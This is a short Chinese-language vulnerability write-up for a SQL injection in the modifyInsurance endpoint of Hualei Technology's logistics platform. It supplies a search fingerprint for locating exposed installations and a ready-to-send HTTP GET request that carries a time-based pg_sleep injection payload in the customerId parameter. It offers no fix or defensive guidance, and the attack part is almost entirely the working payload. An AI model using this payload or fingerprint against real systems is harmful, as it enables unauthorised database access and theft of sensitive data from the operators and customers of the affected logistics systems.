华磊科技物流modifyInsurance存在sql注入漏洞
一、漏洞简介
华磊科技物流modifyInsurance存在sql注入漏洞,攻击者可利用该漏洞获取敏感信息。
二、影响版本
- 华磊科技物流
三、资产测绘
body="l_c_bar" || body="l_c_center"
四、漏洞复现
GET /modifyInsurance.htm?documentCode=-1&insuranceValue=-1&customerId=-1+and+1=(select+1+from+pg_sleep(3)) HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0